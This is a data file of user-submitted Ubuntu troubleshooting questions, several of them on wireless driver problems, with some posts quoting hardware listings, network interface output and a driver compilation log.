1 vendor : intel corporation physical id : 1c bus info : pci @ 0000:00:1c.0 version : 05 width : 32 bits clock : 33mhz capabilities : pci pciexpress msi pm normal_decode bus_master cap_list configuration : driver=pcieport resources : irq:17 ioport:5000 ( size=4096 ) m ... *-pci:1 description : pci bridge product : 5 series/3400 series chipset pci express root port 2 vendor : intel corporation physical id : 1c.1 bus info : pci @ 0000:00:1c.1 version : 05 width : 32 bits clock : 33mhz capabilities : pci pciexpress msi pm normal_decode bus_master cap_list configuration : driver=pcieport resources : irq:16 ioport:4000 ( size=4096 ) mem ... *-network disabled description : wireless interface product : ar9485 wireless network adapter vendor : atheros communications inc. physical id : 0 bus info : pci @ 0000:02:00.0 logical name : wlan0 version : 01 serial : 44:6d:57:18:37 : b7 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list rom ethernet physical wireless configuration : broadcast=yes driver=ath9k driverversion=3.2.0-29-generic firmware=n/a latency=0 link=no multicast=yes wireless=ieee 802.11bgn resources : irq:17 memory : d0500000-d057ffff memory : d0b00000-d0b0ffff *-pci:2 description : pci bridge product : 5 series/3400 series chipset pci express root port 6 vendor : intel corporation physical id : 1c.5 bus info : pci @ 0000:00:1c.5 version : 05 width : 32 bits clock : 33mhz capabilities : pci pciexpress msi pm normal_decode bus_master cap_list configuration : driver=pcieport resources : irq:16 ioport:3000 ( size=4096 ) ... *-network description : ethernet interface product : netlink bcm57780 gigabit ethernet pcie vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:03:00.0 logical name : eth0 version : 01 serial : e8:40 : f2 : c7 : c1:71 size : 10mbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=tg3 driverversion=3.121 duplex=half firmware=sb latency=0 link=no multicast=yes port=mii speed=10mbit/s resources : irq:44 memory : d0400000-d040ffff *-usb:1 description : usb controller product : 5 series/3400 series chipset usb2 enhanced host controller vendor : intel corporation physical id : 1d bus info : pci @ 0000:00:1d.0 version : 05 width : 32 bits clock : 33mhz capabilities : pm debug ehci bus_master cap_list configuration : driver=ehci_hcd latency=0 resources : irq:23 memory : d0609000-d06093ff *-pci:3 description : pci bridge product : 82801 mobile pci bridge vendor : intel corporation physical id : 1e bus info : pci @ 0000:00:1e.0 version : a5 width : 32 bits clock : 33mhz capabilities : pci subtractive_decode bus_master cap_list *-isa description : isa bridge product : mobile 5 series chipset lpc interface controller vendor : intel corporation physical id : 1f bus info : pci @ 0000:00:1f.0 version : 05 width : 32 bits clock : 33mhz capabilities : isa bus_master cap_list configuration : latency=0 *-storage description : sata controller product : 5 series/3400 series chipset 4 port sata ahci controller vendor : intel corporation physical id : 1f.2 bus info : pci @ 0000:00:1f.2 logical name : scsi1 logical name : scsi4 version : 05 width : 32 bits clock : 66mhz capabilities : storage msi pm ahci_1.0 bus_master cap_list emulated configuration : driver=ahci latency=0 resources : irq:40 ioport:2048 ( size=8 ) ioport:205c ( size=4 ) ioport:2040 ( size=8 ) ioport:2058 ( size=4 ) ioport:2020 ( size=32 ) memory : d0608000-d06087ff *-disk description : ata disk product : toshiba mk5059gs vendor : toshiba physical id : 0 bus info : scsi @ 1:0.0.0 logical name : /dev/sda version : gn00 serial : 32kit194t size : 465gib ( 500gb ) capabilities : partitioned partitioned : dos configuration : ansiversion=5 signature=00093e40 *-volume:0 description : ext4 volume vendor : linux physical id : 1 bus info : scsi @ 1:0.0.0,1 logical name : /dev/sda1 logical name : / version : 1.0 serial : 32e0eda1-7f0d-49e3-b97a-177046053d7f size : 462gib capacity : 462gib *-volume:1 description : extended partition physical id : 2 bus info : scsi @ 1:0.0.0,2 logical name : /dev/sda2 size : 3763mib capacity : 3763mib capabilities : primary extended partitioned partitioned : extended *-logicalvolume description : linux swap / solaris partition physical id : 5 logical name : /dev/sda5 capacity : 3763mib capabilities : nofs *-cdrom description : dvd-ram writer product : dvd-ram uj8b0aw vendor : matshita physical id : 1 bus info : scsi @ 4:0.0.0 logical name : /dev/cdrom logical name : /dev/cdrw logical name : /dev/dvd logical name : /dev/dvdrw logical name : /dev/sr0 version : 1.00 capabilities : removable audio cd-r cd-rw dvd dvd-r dvd-ram configuration : ansiversion=5 status=nodisc *-serial unclaimed description : smbus product : 5 series/3400 series chipset smbus controller vendor : intel corporation physical id : 1f.3 bus info : pci @ 0000:00:1f.3 version : 05 width : 64 bits clock : 33mhz configuration : latency=0 resources : memory : d0606000-d06060ff ioport:2000 ( size=32 ) *-generic description : signal processing controller product : 5 series/3400 series chipset thermal subsystem vendor : intel corporation physical id : 1f.6 bus info : pci @ 0000:00:1f.6 version : 05 width : 64 bits clock : 33mhz capabilities : pm msi bus_master cap_list configuration : driver=intel ips latency=0 resources : irq:21 memory : d0607000-d0607fff *-pci:1 description : host bridge product : core processor quickpath architecture generic non-core registers vendor : intel corporation physical id : 101 bus info : pci @ 0000:3f:00.0 version : 02 width : 32 bits clock : 33mhz *-pci:2 description : host bridge product : core processor quickpath architecture system address decoder vendor : intel corporation physical id : 102 bus info : pci @ 0000:3f:00.1 version : 02 width : 32 bits clock : 33mhz *-pci:3 description : host bridge product : core processor qpi link 0 vendor : intel corporation physical id : 103 bus info : pci @ 0000:3f:02.0 version : 02 width : 32 bits clock : 33mhz *-pci:4 description : host bridge product : core processor qpi physical 0 vendor : intel corporation physical id : 104 bus info : pci @ 0000:3f:02.1 version : 02 width : 32 bits clock : 33mhz *-pci:5 description : host bridge product : core processor reserved vendor : intel corporation physical id : 105 bus info : pci @ 0000:3f:02.2 version : 02 width : 32 bits clock : 33mhz *-pci:6 description : host bridge product : core processor reserved vendor : intel corporation physical id : 106 bus info : pci @ 0000:3f:02.3 version : 02 width : 32 bits clock : 33mhz joachim @ joachim-travelmate-5744 : ~ $ ifconfig -a eth0 link encap : ethernet hwaddr e8:40 : f2 : c7 : c1:71 inet6 addr : fe80 : :ea40 : f2ff : fec7 : c171/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:11 errors:0 dropped:0 overruns:0 frame:0 tx packets:20 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:5819 ( 5.8 kb ) tx bytes:3524 ( 3.5 kb ) interrupt:17 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:176 errors:0 dropped:0 overruns:0 frame:0 tx packets:176 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:14144 ( 14.1 kb ) tx bytes:14144 ( 14.1 kb ) wlan0 link encap : ethernet hwaddr 44:6d:57:18:37 : b7 broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) joachim @ joachim-travelmate-5744 : ~ $ nm-tool networkmanager tool state : connecting - device : eth0 [ wired connection 1 ] -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - type : wired driver : tg3 state : connecting ( configuring ) default : no hw address : e8:40 : f2 : c7 : c1:71 capabilities : carrier detect : yes speed : 10 mb/s wired properties carrier : on - device : wlan0 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- type : 802.11 wifi driver : ath9k state : unavailable default : no hw address : 44:6d:57:18:37 : b7 capabilities : wireless properties wep encryption : yes wpa encryption : yes wpa2 encryption : yes wireless access points
225288	install cmake occurs a error , how to deal with it ?	i am installing cmake in ubuntu , after did the last step `` make install '' , this is the result : -- install configuration : '' '' cmake error at cmake_install.cmake:36 ( file ) : file can not create directory : /user/local/doc/cmake-2.8 . maybe need administrative privileges . make : *** [ install ] error 1 does it mean it did n't install successfully ?
225289	ubuntu 12.10 hangs on checking battery state	i have a thinkpad x230 . after a boot it hangs with checking battery state [ ok ] . a second boot is most times successful . what i have seen in other posts does n't fit to my problem , because my graphics card is intel 3rd gen core processor graphics controller ( not nvidia ) it happens not always i have a fresh installed 12.10 with the latest updates ( no upgrade ) does anyone experience the same issues or has a solution ?
225292	i want to change the pulseaudio config file	i want to change the pulseaudio config file as outlined on this page : http : //www.linuxplanet.com/linuxplanet/tutorials/7130/2 but if i try to do it from the command line or from going directly to the folder i get permission denied messages . i tried to chmod it , but that does n't work either . i guess i have to log in as root , but there are all sorts of warnings on the net that warn ignoramuses like me not to operate from root because you might destroy the system . is there any other way ?
225297	wireless not working - hp probook 4540s	i just installed ubuntu 12.04 on 3 hp probook 4540s 's , and none of them seems to be able to connect to wireless networks . i have 1 probook 4540s with windows 7 installed and i can access wlan from it . i tried installing the necessary drivers from hp 's website , but it still does n't seem to be working . i 've seen other people with different probooks having similar problems , but their computers seem to be able to detect and even attempt to connect wlans , while mine does n't even acknowledge that it has wireless . any help would be appreciated . lspci : 00:00.0 host bridge : intel corporation ivy bridge dram controller ( rev 09 ) 00:01.0 pci bridge : intel corporation ivy bridge pci express root port ( rev 09 ) 00:02.0 vga compatible controller : intel corporation ivy bridge graphics controller ( rev 09 ) 00:14.0 usb controller : intel corporation panther point usb xhci host controller ( rev 04 ) 00:16.0 communication controller : intel corporation panther point mei controller # 1 ( rev 04 ) 00:1a.0 usb controller : intel corporation panther point usb enhanced host controller # 2 ( rev 04 ) 00:1b.0 audio device : intel corporation panther point high definition audio controller ( rev 04 ) 00:1c.0 pci bridge : intel corporation panther point pci express root port 1 ( rev c4 ) 00:1c.2 pci bridge : intel corporation panther point pci express root port 3 ( rev c4 ) 00:1c.3 pci bridge : intel corporation panther point pci express root port 4 ( rev c4 ) 00:1c.5 pci bridge : intel corporation panther point pci express root port 6 ( rev c4 ) 00:1d.0 usb controller : intel corporation panther point usb enhanced host controller # 1 ( rev 04 ) 00:1f.0 isa bridge : intel corporation panther point lpc controller ( rev 04 ) 00:1f.2 sata controller : intel corporation panther point 6 port sata controller [ ahci mode ] ( rev 04 ) 01:00.0 vga compatible controller : advanced micro devices [ amd ] nee ati thames [ radeon 7500m/7600m series ] 03:00.0 system peripheral : jmicron technology corp. sd/mmc host controller ( rev 30 ) 03:00.2 sd host controller : jmicron technology corp. standard sd host controller ( rev 30 ) 03:00.3 system peripheral : jmicron technology corp. ms host controller ( rev 30 ) 04:00.0 network controller : ralink corp. device 3290 04:00.1 bluetooth : ralink corp. device 3298 05:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller ( rev 07 ) output from sudo make : make -c tools make [ 1 ] : entering directory `/home/olimp3/downloads/driver/files/tools' gcc -g bin2h.c -o bin2h make [ 1 ] : leaving directory `/home/olimp3/downloads/driver/files/tools' /home/olimp3/downloads/driver/files/tools/bin2h cp -f os/linux/makefile.6 /home/olimp3/downloads/driver/files/os/linux/makefile make -c /lib/modules/3.2.0-34-generic/build subdirs=/home/olimp3/downloads/driver/files/os/linux modules make [ 1 ] : entering directory `/usr/src/linux-headers-3.2.0-34-generic' cc [ m ] /home/olimp3/downloads/driver/files/os/linux/../../common/crypt_md5.o cc [ m ] /home/olimp3/downloads/driver/files/os/linux/../../common/crypt_sha2.o cc [ m ] /home/olimp3/downloads/driver/files/os/linux/../../common/crypt_hmac.o cc [ m ] /home/olimp3/downloads/driver/files/os/linux/../../common/crypt_aes.o /home/olimp3/downloads/driver/files/os/linux/../../common/crypt_aes.c : in function ‘aes_key_wrap’ : /home/olimp3/downloads/driver/files/os/linux/../../common/crypt_aes.c:1466:6 : warning : format ‘ % d’ expects argument of type ‘int’ , but argument 2 has type ‘long unsigned int’ [ -wformat ] /home/olimp3/downloads/driver/files/os/linux/../../common/crypt_aes.c : in function ‘aes_key_unwrap’ : /home/olimp3/downloads/driver/files/os/linux/../../common/crypt_aes.c:1561:6 : warning : format ‘ % d’ expects argument of type ‘int’ , but argument 2 has type ‘long unsigned int’ [ -wformat ] cc [ m ] /home/olimp3/downloads/driver/files/os/linux/../../common/crypt_arc4.o cc [ m ] /home/olimp3/downloads/driver/files/os/linux/../../common/mlme.o /home/olimp3/downloads/driver/files/os/linux/../../common/mlme.c : in function ‘mlmeresetralinkcounters’ : /home/olimp3/downloads/driver/files/os/linux/../../common/mlme.c:528:3 : warning : cast from pointer to integer of different size [ -wpointer-to-int-cast ] /home/olimp3/downloads/driver/files/os/linux/../../common/mlme.c:528:3 : warning : cast from pointer to integer of different size [ -wpointer-to-int-cast ] cc [ m ] /home/olimp3/downloads/driver/files/os/linux/../../common/cmm_wep.o cc [ m ] /home/olimp3/downloads/driver/files/os/linux/../../common/action.o cc [ m ] /home/olimp3/downloads/driver/files/os/linux/../../common/cmm_data.o cc [ m ] /home/olimp3/downloads/driver/files/os/linux/../../common/rtmp_init.o cc [ m ] /home/olimp3/downloads/driver/files/os/linux/../../common/rtmp_init_inf.o /home/olimp3/downloads/driver/files/os/linux/../../common/rtmp_init_inf.c : in function ‘rt28xx_init’ : /home/olimp3/downloads/driver/files/os/linux/../../common/rtmp_init_inf.c:162:3 : warning : format ‘ % x’ expects argument of type ‘unsigned int’ , but argument 2 has type ‘ulong’ [ -wformat ] /home/olimp3/downloads/driver/files/os/linux/../../common/rtmp_init_inf.c:178:10 : warning : iso c90 forbids mixed declarations and code [ -wdeclaration-after-statement ] cc [ m ] /home/olimp3/downloads/driver/files/os/linux/../../common/cmm_tkip.o cc [ m ] /home/olimp3/downloads/driver/files/os/linux/../../common/cmm_aes.o cc [ m ] /home/olimp3/downloads/driver/files/os/linux/../../common/cmm_sync.o cc [ m ] /home/olimp3/downloads/driver/files/os/linux/../../common/eeprom.o cc [ m ] /home/olimp3/downloads/driver/files/os/linux/../../common/cmm_sanity.o cc [ m ] /home/olimp3/downloads/driver/files/os/linux/../../common/cmm_info.o cc [ m ] /home/olimp3/downloads/driver/files/os/linux/../../common/cmm_cfg.o cc [ m ] /home/olimp3/downloads/driver/files/os/linux/../../common/cmm_wpa.o /home/olimp3/downloads/driver/files/os/linux/../../common/cmm_wpa.c : in function ‘peerpairmsg3action’ : /home/olimp3/downloads/driver/files/os/linux/../../common/cmm_wpa.c:1032:13 : warning : unused variable ‘cancelled’ [ -wunused-variable ] cc [ m ] /home/olimp3/downloads/driver/files/os/linux/../../common/cmm_radar.o cc [ m ] /home/olimp3/downloads/driver/files/os/linux/../../common/spectrum.o /home/olimp3/downloads/driver/files/os/linux/../../common/spectrum.c : in function ‘peermeasurereportaction’ : /home/olimp3/downloads/driver/files/os/linux/../../common/spectrum.c:1972:3 : warning : format ‘ % d’ expects argument of type ‘int’ , but argument 3 has type ‘long unsigned int’ [ -wformat ] cc [ m ] /home/olimp3/downloads/driver/files/os/linux/../../common/rtmp_timer.o cc [ m ] /home/olimp3/downloads/driver/files/os/linux/../../common/rt_channel.o cc [ m ] /home/olimp3/downloads/driver/files/os/linux/../../common/cmm_profile.o cc [ m ] /home/olimp3/downloads/driver/files/os/linux/../../common/cmm_asic.o cc [ m ] /home/olimp3/downloads/driver/files/os/linux/../../common/cmm_cmd.o cc [ m ] /home/olimp3/downloads/driver/files/os/linux/../../common/ps.o cc [ m ] /home/olimp3/downloads/driver/files/os/linux/../../common/uapsd.o cc [ m ] /home/olimp3/downloads/driver/files/os/linux/../../rate_ctrl/ra_ctrl.o cc [ m ] /home/olimp3/downloads/driver/files/os/linux/../../rate_ctrl/alg_legacy.o cc [ m ] /home/olimp3/downloads/driver/files/os/linux/../../rate_ctrl/alg_ags.o cc [ m ] /home/olimp3/downloads/driver/files/os/linux/../../chips/rtmp_chip.o cc [ m ] /home/olimp3/downloads/driver/files/os/linux/../../sta/assoc.o cc [ m ] /home/olimp3/downloads/driver/files/os/linux/../../sta/auth.o cc [ m ] /home/olimp3/downloads/driver/files/os/linux/../../sta/auth_rsp.o cc [ m ] /home/olimp3/downloads/driver/files/os/linux/../../sta/sync.o cc [ m ] /home/olimp3/downloads/driver/files/os/linux/../../sta/sanity.o cc [ m ] /home/olimp3/downloads/driver/files/os/linux/../../sta/rtmp_data.o /home/olimp3/downloads/driver/files/os/linux/../../sta/rtmp_data.c : in function ‘stahandlerxdataframe’ : /home/olimp3/downloads/driver/files/os/linux/../../sta/rtmp_data.c:283:17 : warning : unused variable ‘pfmectrl’ [ -wunused-variable ] /home/olimp3/downloads/driver/files/os/linux/../../sta/rtmp_data.c:282:8 : warning : unused variable ‘oldpwrmgmt’ [ -wunused-variable ] /home/olimp3/downloads/driver/files/os/linux/../../sta/rtmp_data.c : in function ‘stahandlerxmgmtframe’ : /home/olimp3/downloads/driver/files/os/linux/../../sta/rtmp_data.c:766:5 : warning : iso c90 forbids mixed declarations and code [ -wdeclaration-after-statement ] cc [ m ] /home/olimp3/downloads/driver/files/os/linux/../../sta/connect.o cc [ m ] /home/olimp3/downloads/driver/files/os/linux/../../sta/wpa.o cc [ m ] /home/olimp3/downloads/driver/files/os/linux/../../sta/sta_cfg.o /home/olimp3/downloads/driver/files/os/linux/../../sta/sta_cfg.c : in function ‘rtmpqueryinformation’ : /home/olimp3/downloads/driver/files/os/linux/../../sta/sta_cfg.c:3956:4 : warning : format ‘ % d’ expects argument of type ‘int’ , but argument 2 has type ‘long unsigned int’ [ -wformat ] /home/olimp3/downloads/driver/files/os/linux/../../sta/sta_cfg.c : in function ‘rtmpioctl_rt_private_get_statistics’ : /home/olimp3/downloads/driver/files/os/linux/../../sta/sta_cfg.c:7220:1 : warning : format ‘ % x’ expects argument of type ‘unsigned int’ , but argument 3 has type ‘eeprom_nic_config3_struc’ [ -wformat ] cc [ m ] /home/olimp3/downloads/driver/files/os/linux/../../common/rt_os_util.o cc [ m ] /home/olimp3/downloads/driver/files/os/linux/../../common/ba_action.o /home/olimp3/downloads/driver/files/os/linux/../../common/ba_action.c : in function ‘convert_reordering_packet_to_preamsdu_or_802_3_packet’ : /home/olimp3/downloads/driver/files/os/linux/../../common/ba_action.c:1550:2 : warning : assignment makes integer from pointer without a cast [ enabled by default ] cc [ m ] /home/olimp3/downloads/driver/files/os/linux/../../common/rt_led.o cc [ m ] /home/olimp3/downloads/driver/files/os/linux/../../common/cmm_mac_pci.o /home/olimp3/downloads/driver/files/os/linux/../../common/cmm_mac_pci.c : in function ‘rt28xxpcimlmeradioon’ : /home/olimp3/downloads/driver/files/os/linux/../../common/cmm_mac_pci.c:2245:13 : warning : unused variable ‘cancelled’ [ -wunused-variable ] cc [ m ] /home/olimp3/downloads/driver/files/os/linux/../../common/cmm_data_pci.o /home/olimp3/downloads/driver/files/os/linux/../../common/cmm_data_pci.c : in function ‘rtmpfreetxdupontxdmadone’ : /home/olimp3/downloads/driver/files/os/linux/../../common/cmm_data_pci.c:543:8 : warning : unused variable ‘txwisize’ [ -wunused-variable ] /home/olimp3/downloads/driver/files/os/linux/../../common/cmm_data_pci.c : in function ‘rtmphandlemgmtringdmadoneinterrupt’ : /home/olimp3/downloads/driver/files/os/linux/../../common/cmm_data_pci.c:738:8 : warning : unused variable ‘txwisize’ [ -wunused-variable ] cc [ m ] /home/olimp3/downloads/driver/files/os/linux/../../common/rtmp_mcu.o /home/olimp3/downloads/driver/files/os/linux/../../common/rtmp_mcu.c : in function ‘rtmpasicsendcommandtomcu’ : /home/olimp3/downloads/driver/files/os/linux/../../common/rtmp_mcu.c:464:8 : warning : unused variable ‘offset’ [ -wunused-variable ] /home/olimp3/downloads/driver/files/os/linux/../../common/rtmp_mcu.c:463:8 : warning : unused variable ‘configuration’ [ -wunused-variable ] cc [ m ] /home/olimp3/downloads/driver/files/os/linux/../../common/ee_prom.o cc [ m ] /home/olimp3/downloads/driver/files/os/linux/../../common/ee_efuse.o cc [ m ] /home/olimp3/downloads/driver/files/os/linux/../../common/rt_rf.o cc [ m ] /home/olimp3/downloads/driver/files/os/linux/../../chips/rt30xx.o cc [ m ] /home/olimp3/downloads/driver/files/os/linux/../../chips/rt3290.o /home/olimp3/downloads/driver/files/os/linux/../../chips/rt3290.c : in function ‘rt3290_asictxalcgetautoagcoffset’ : /home/olimp3/downloads/driver/files/os/linux/../../chips/rt3290.c:1564:25 : warning : assignment discards ‘const’ qualifier from pointer target type [ enabled by default ] /home/olimp3/downloads/driver/files/os/linux/../../chips/rt3290.c : in function ‘mlmeantselection’ : /home/olimp3/downloads/driver/files/os/linux/../../chips/rt3290.c:2489:4 : warning : format ‘ % d’ expects argument of type ‘int’ , but argument 2 has type ‘ulong’ [ -wformat ] /home/olimp3/downloads/driver/files/os/linux/../../chips/rt3290.c:2489:4 : warning : format ‘ % d’ expects argument of type ‘int’ , but argument 3 has type ‘ulong’ [ -wformat ] /home/olimp3/downloads/driver/files/os/linux/../../chips/rt3290.c:2489:4 : warning : format ‘ % d’ expects argument of type ‘int’ , but argument 4 has type ‘ulong’ [ -wformat ] /home/olimp3/downloads/driver/files/os/linux/../../chips/rt3290.c:2507:5 : warning : format ‘ % d’ expects argument of type ‘int’ , but argument 2 has type ‘ulong’ [ -wformat ] /home/olimp3/downloads/driver/files/os/linux/../../chips/rt3290.c:2522:5 : warning : format ‘ % d’ expects argument of type ‘int’ , but argument 2 has type ‘ulong’ [ -wformat ] /home/olimp3/downloads/driver/files/os/linux/../../chips/rt3290.c:2522:5 : warning : format ‘ % d’ expects argument of type ‘int’ , but argument 3 has type ‘ulong’ [ -wformat ] /home/olimp3/downloads/driver/files/os/linux/../../chips/rt3290.c:2523:5 : warning : format ‘ % d’ expects argument of type ‘int’ , but argument 2 has type ‘ulong’ [ -wformat ] /home/olimp3/downloads/driver/files/os/linux/../../chips/rt3290.c:2523:5 : warning : format ‘ % d’ expects argument of type ‘int’ , but argument 3 has type ‘ulong’ [ -wformat ] /home/olimp3/downloads/driver/files/os/linux/../../chips/rt3290.c:2526:5 : warning : format ‘ % d’ expects argument of type ‘int’ , but argument 2 has type ‘ulong’ [ -wformat ] /home/olimp3/downloads/driver/files/os/linux/../../chips/rt3290.c:2526:5 : warning : format ‘ % d’ expects argument of type ‘int’ , but argument 3 has type ‘ulong’ [ -wformat ] /home/olimp3/downloads/driver/files/os/linux/../../chips/rt3290.c:2527:5 : warning : format ‘ % d’ expects argument of type ‘int’ , but argument 2 has type ‘ulong’ [ -wformat ] /home/olimp3/downloads/driver/files/os/linux/../../chips/rt3290.c:2527:5 : warning : format ‘ % d’ expects argument of type ‘int’ , but argument 3 has type ‘ulong’ [ -wformat ] /home/olimp3/downloads/driver/files/os/linux/../../chips/rt3290.c:2528:5 : warning : format ‘ % d’ expects argument of type ‘int’ , but argument 2 has type ‘ulong’ [ -wformat ] /home/olimp3/downloads/driver/files/os/linux/../../chips/rt3290.c:2528:5 : warning : format ‘ % d’ expects argument of type ‘int’ , but argument 3 has type ‘ulong’ [ -wformat ] /home/olimp3/downloads/driver/files/os/linux/../../chips/rt3290.c:2545:6 : warning : format ‘ % d’ expects argument of type ‘int’ , but argument 2 has type ‘ulong’ [ -wformat ] /home/olimp3/downloads/driver/files/os/linux/../../chips/rt3290.c:2545:6 : warning : format ‘ % d’ expects argument of type ‘int’ , but argument 3 has type ‘ulong’ [ -wformat ] /home/olimp3/downloads/driver/files/os/linux/../../chips/rt3290.c:2545:6 : warning : format ‘ % d’ expects argument of type ‘int’ , but argument 4 has type ‘ulong’ [ -wformat ] /home/olimp3/downloads/driver/files/os/linux/../../chips/rt3290.c:2559:9 : warning : format ‘ % d’ expects argument of type ‘int’ , but argument 2 has type ‘ulong’ [ -wformat ] /home/olimp3/downloads/driver/files/os/linux/../../chips/rt3290.c:2565:9 : warning : format ‘ % d’ expects argument of type ‘int’ , but argument 2 has type ‘ulong’ [ -wformat ] /home/olimp3/downloads/driver/files/os/linux/../../chips/rt3290.c:2574:8 : warning : format ‘ % d’ expects argument of type ‘int’ , but argument 2 has type ‘ulong’ [ -wformat ] /home/olimp3/downloads/driver/files/os/linux/../../chips/rt3290.c:2581:8 : warning : format ‘ % d’ expects argument of type ‘int’ , but argument 2 has type ‘ulong’ [ -wformat ] /home/olimp3/downloads/driver/files/os/linux/../../chips/rt3290.c:2583:7 : warning : format ‘ % d’ expects argument of type ‘int’ , but argument 2 has type ‘ulong’ [ -wformat ] /home/olimp3/downloads/driver/files/os/linux/../../chips/rt3290.c:2583:7 : warning : format ‘ % d’ expects argument of type ‘int’ , but argument 3 has type ‘ulong’ [ -wformat ] /home/olimp3/downloads/driver/files/os/linux/../../chips/rt3290.c:2595:6 : warning : format ‘ % d’ expects argument of type ‘int’ , but argument 2 has type ‘ulong’ [ -wformat ] /home/olimp3/downloads/driver/files/os/linux/../../chips/rt3290.c:2595:6 : warning : format ‘ % d’ expects argument of type ‘int’ , but argument 3 has type ‘ulong’ [ -wformat ] /home/olimp3/downloads/driver/files/os/linux/../../chips/rt3290.c:2596:6 : warning : format ‘ % d’ expects argument of type ‘int’ , but argument 2 has type ‘ulong’ [ -wformat ] /home/olimp3/downloads/driver/files/os/linux/../../chips/rt3290.c:2596:6 : warning : format ‘ % d’ expects argument of type ‘int’ , but argument 3 has type ‘ulong’ [ -wformat ] /home/olimp3/downloads/driver/files/os/linux/../../chips/rt3290.c:2597:6 : warning : format ‘ % d’ expects argument of type ‘int’ , but argument 2 has type ‘ulong’ [ -wformat ] /home/olimp3/downloads/driver/files/os/linux/../../chips/rt3290.c:2597:6 : warning : format ‘ % d’ expects argument of type ‘int’ , but argument 3 has type ‘ulong’ [ -wformat ] /home/olimp3/downloads/driver/files/os/linux/../../chips/rt3290.c : in function ‘btcoexsetting’ : /home/olimp3/downloads/driver/files/os/linux/../../chips/rt3290.c:3244:4 : warning : format ‘ % d’ expects argument of type ‘int’ , but argument 3 has type ‘ulong’ [ -wformat ] /home/olimp3/downloads/driver/files/os/linux/../../chips/rt3290.c : in function ‘profile_twoant’ : /home/olimp3/downloads/driver/files/os/linux/../../chips/rt3290.c:4097:2 : warning : format ‘ % x’ expects argument of type ‘unsigned int’ , but argument 2 has type ‘cmb_ctrl_struc’ [ -wformat ] cc [ m ] /home/olimp3/downloads/driver/files/os/linux/../../common/frq_cal.o /home/olimp3/downloads/driver/files/os/linux/../../common/frq_cal.c : in function ‘frequencycalibration’ : /home/olimp3/downloads/driver/files/os/linux/../../common/frq_cal.c:198:18 : warning : comparison of distinct pointer types lacks a cast [ enabled by default ] /home/olimp3/downloads/driver/files/os/linux/../../common/frq_cal.c:211:18 : warning : comparison of distinct pointer types lacks a cast [ enabled by default ] /home/olimp3/downloads/driver/files/os/linux/../../common/frq_cal.c:227:18 : warning : comparison of distinct pointer types lacks a cast [ enabled by default ] /home/olimp3/downloads/driver/files/os/linux/../../common/frq_cal.c:252:18 : warning : comparison of distinct pointer types lacks a cast [ enabled by default ] /home/olimp3/downloads/driver/files/os/linux/../../common/frq_cal.c:265:18 : warning : comparison of distinct pointer types lacks a cast [ enabled by default ] /home/olimp3/downloads/driver/files/os/linux/../../common/frq_cal.c:281:18 : warning : comparison of distinct pointer types lacks a cast [ enabled by default ] /home/olimp3/downloads/driver/files/os/linux/../../common/frq_cal.c:132:10 : warning : unused variable ‘bupdaterfr’ [ -wunused-variable ] ld [ m ] /home/olimp3/downloads/driver/files/os/linux/rt3290sta.o building modules , stage 2 . modpost 1 modules warning : modpost : missing module_license ( ) in /home/olimp3/downloads/driver/files/os/linux/rt3290sta.o see include/linux/module.h for more information ld [ m ] /home/olimp3/downloads/driver/files/os/linux/rt3290sta.ko make [ 1 ] : leaving directory `/usr/src/linux-headers-3.2.0-34-generic' cp -f /home/olimp3/downloads/driver/files/os/linux/rt3290sta.ko /tftpboot output from lspci -nnk | grep -ea3 ralink : 04:00.0 network controller [ 0280 ] : ralink corp. device [ 1814:3290 ] subsystem : hewlett-packard company device [ 103c:18ec ] 04:00.1 bluetooth [ 0d11 ] : ralink corp. device [ 1814:3298 ] subsystem : hewlett-packard company device [ 103c:18ec ] 05:00.0 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller [ 10ec:8168 ] ( rev 07 ) subsystem : hewlett-packard company device [ 103c:17f6 ]
225305	hp 2410 printer shared on winwows xp not visible on ubuntu 's network	i have ubuntu 12.04 and hp 2410 printer shared on windows xp . problem is that under ubuntu are visible only network printers , but not printers shared on xp . i installed hp device manager , and shared printers are still not visible . also , i noticed that i can not find shared printers , like i can find shared windows xp directories . can you tell me what did i miss to get this to work . just to mention that printing is possible from other windows xp workstation . and of course , samba is running under ubuntu . thank you very much in advance !
225310	update-manager fails on mergelist error	update manager does n't want to run because of the error given below . the happens when trying to launch ubuntu software center . i 'm using ubuntu 12.04 . any help would be much appreciated . thanks sylvain error message : e : encountered a section with no package : header , e : problem with mergelist /var/lib/apt/lists/gb.archive.ubuntu.com_ubuntu_dists_precise-updates_main_i18n_translation-en , e : the package lists or status file could not be parsed or opened .
225312	ubuntu 12.04 x86 wireless not working	i am a new ubuntu user , i had enough problems with windows always crashing . so yesterday i installed ubuntu 12.04 on my laptop . i have an acer aspire 5942g , everything is running smoothly except i can not get the wireless to work at all . the terminal stuff is new to me , i 'd appreciate any suggestions . obs . : i have looked at some forums/posts on the wireless issue , however none have resolved mine . hope you guys can help me . thanks .
